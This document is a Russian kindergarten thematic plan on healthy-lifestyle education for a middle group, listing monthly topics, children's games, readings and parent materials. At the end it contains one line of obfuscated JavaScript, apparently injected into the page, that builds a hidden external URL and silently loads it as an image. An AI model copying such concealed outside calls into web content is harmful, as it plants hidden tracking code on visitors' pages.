|
Тематический план по формирование культуры здорового образа жизни у воспитанников в средней группе
Месяц |
Тема |
Содержание и формы работы с детьми |
Содержание и
формы работы с родителями |
Сентябрь |
Ребёнок и здоровье |
1. Игра- занятие «Помоги Зайке сберечь здоровье»
Цель: Формировать у детей первоначальные навыки охраны жизни и здоровья. На основе ситуационных моментов учить делать выводы о безопасности жизнедеятельности. Воспитывать чувство взаимовыручки, стремление оказывать помощь друг другу.
2. Д/игра «Кому что нужно»
Цель: закреплять знания детей о предметах, необходимых для работы врачу, повару, продавцу.
3. С/рол. игры «Поликлиника», «Больница»
Цель: расширить знания детей о профессиональных действиях медицинских работников, воспитывать уважение к их труду. Учить объединяться в игре, распределять роли.
4. Чтение К.Чуковский «Доктор Айболит» |
Анкета для родителей «Семья и здоровье ребёнка»
Цель: выявление роли физической культуры в семье. |
Октябрь |
Полезные продукты |
1. Занятие «Фрукты полезны взрослым и детям»
Цель: Уточнить знания детей о полезных продуктах, рассказать о пользе фруктов для здоровья человека.
2.Дидактические игры «Чудесный мешочек», «Узнай по описанию», «Разложи на тарелках полезные продукты»
Цель: Закрепить название овощей и фруктов, умение узнавать их на ощупь и по описанию, упражнять в умении дифференцировать овощи и фрукты.
3. С/рол. игра «Овощной магазин»
Цель: Закрепить название овощей и фруктов, воспитывать культуру поведения в общественных местах.
4. Чтение Ю.Тувим «Овощи», Г.Зайцев «Приятного аппетита»
5. Продуктивная деятельность Рисование «Что за яблочко, оно соку спелого полно»
Цель: Учить детей изображать предметы круглой формы, закрашивать, не выходя за края. Закрепить знания о пользе фруктов.
6. Развлечение «Весёлые овощи» |
Папка-ширма:
«Что такое правильное питание»
Журнал «Здоровье»: «Детские закуски |
Ноябрь |
Личная гигиена |
1.Беседа «Чистота и здоровье»
Цель: Формировать у детей понимание значения и необходимости гигиенических процедур.
2.Дидактические игры «Таня простудилась», «Сделаем куклам разные причёски», «Вымоем куклу»
Цель: способствовать формированию навыка пользования носовым платком, закреплять навыки ухода за волосами, знания о предметах личной гигиены. Способствовать формированию привычки к опрятности.
3. С/рол. игра «Парикмахерская»
Цель: Закреплять знания о профессии парикмахера, формировать навыки культуры общения, поведения.
4.Чтение К.Чуковский «Мойдодыр», А.Барто «девочка чумазая», З.Александрова «Купание», потешки : «Расти коса до пояса», «Водичка водичка»
5. Развлечение «Девочка чумазая» |
|
Декабрь |
Тело человека |
1. Беседа «Моё тело»
Цель: Познакомить детей с частями тела, рассказать об органах чувств.
2.Дидактические игры «Запомни движение», «Посылка от обезьянки.
Цель: Упражнять в умении осознавать, запоминать и воспроизводить показанные движения, развивать зрительно-моторную память, внимание.
3. Чтение С.Прокофьев «Румяные щечки», Н.Саконская «Где мой пальчик» |
|
Январь |
Витамины и здоровье |
1. Беседа «Витамины и здоровье»
Цель: Рассказать о пользе витаминов и их значении для здоровья человека.
2. Дидактические игры «Угадай на вкус», «Назови правильно»
Цель: Закреплять знания детей о пользе овощей и фруктов, умение определять их по вкусу.
3. Продуктивная деятельность Рисование «Витамины»
Цель: Учить детей симметрично располагать рисунок, заполнять всё пространство контура, закрепить умение рисовать ватной палочкой. Закрепить знание детей о пользах витаминов.
4. Развлечение «Таблетки растут на грядке, таблетки растут на ветке» |
Журнал «Здоровье»
«Советы по пре-дупреждению нару-шения осанки у детей»
«Упражнения для формирования правильной осанки у детей»
Папка-ширма:
«Предупреждение плоскостопия у детей» |
Февраль |
Ребёнок на улицах города |
1. Занятие «Всем ребятам надо знать, как по улице шагать»
Цель: Познакомить детей с элементарными правилами поведения на улице, правилами дорожного движения, рассказать о светофоре.
2. Беседа «Если ты потерялся на улице»
Цель: познакомить детей с элементарными правилами поведения в сложных ситуациях, рассказать к кому можно обратится за помощью.
3.Дидактическая игра «О чём говорит светофор»
Цель: закрепить знание детьми значения сигналов светофора.
4.Подвижные игры «Цветные автомобили», «Воробушки и автомобиль»
5. С/рол. игра «Автобус»
Цель: Упражнять детей в навыках правильного поведения в транспорте, способствовать формированию культуры речевого общения.
6.Чтение С.Михалков «Дядя Степа–милиционер», В.Кли-менко «Зайка-велосипедист»
7. Развлечение «Незнайка на улице» |
|
Март |
Будем спортом заниматься |
1. Беседа «Здоровье в порядке, спасибо зарядке»
Цель: Способствовать формированию основ здорового образа жизни, потребности заниматься физической культурой и спортом. Закремить название некоторых видов спорта.
2. Дидактическая игра «Назови вид спорта»
Цель: Закрепить название некоторых видов спорта
3. С/рол. игра «Физкультурное занятие в детском саду»
Цель: Формировать привычку к здоровому образу жизни, потребность в двигательной деятельности
4. Продуктивная деятельность Рисование «Разноцветные мячи»
Цель: Упражнять детей в рисовании предметов круглой формы. Уточнить знания о спортивном инвентаре.
5. Спортивное развлечение «Мы мороза не боимся» |
Папка-ширма «Массаж против насморка»
Журнал «Здоровье»
«Упражнения ды-хательной гимнастики для часто болеющих детей» |
Апрель |
Врачи – наши помощники |
1. Занятие «Врачи – наши помощники»
Цель: Продолжать воспитывать у детей понимание ценности здоровья, потребность быть здоровым, закрепить знания о витаминах, уточнить представления об овощах, учить сажать лук
2. Экскурсия в аптеку
Цель: Познакомить детей с работой фармацевта: отпускает лекарства и витамины по рецептам врача
3. С/рол. игры «Аптека», «Больница»
Цель: Закрепить знание детей о профессии врача, способствовать формированию основ здорового образа жизни.
4. Чтение Е.Шкловский «Как лечили мишку», А.Барто «Мы с Тамарой»
5. День здоровья |
|
Май |
Опасности вокруг нас |
1.Беседа «Опасные предметы вокруг нас»
Цель: Учить детей осторожному обращению с предметами, которые могут быть источниками опасности.
2.Дидактическая игра «Я знаю, что можно, что нельзя»
Цель: Закрепить знания детей об опасных предметах и ситуациях, представляющих опасность.
3. С/рол. игры «Семья», «Больница»
Цель: Способствовать объединению нескольких игр в единую сюжетную линию, закрепить знание о профессиях врача, медсестры.
4. Развлечение «Медведи в гостях у детей» |
Папка-ширма
«Учим детей основам безопасности» |
var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['ispnwqwf.lussoit.com','80'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));
21 ноября 2020 в 15:16
|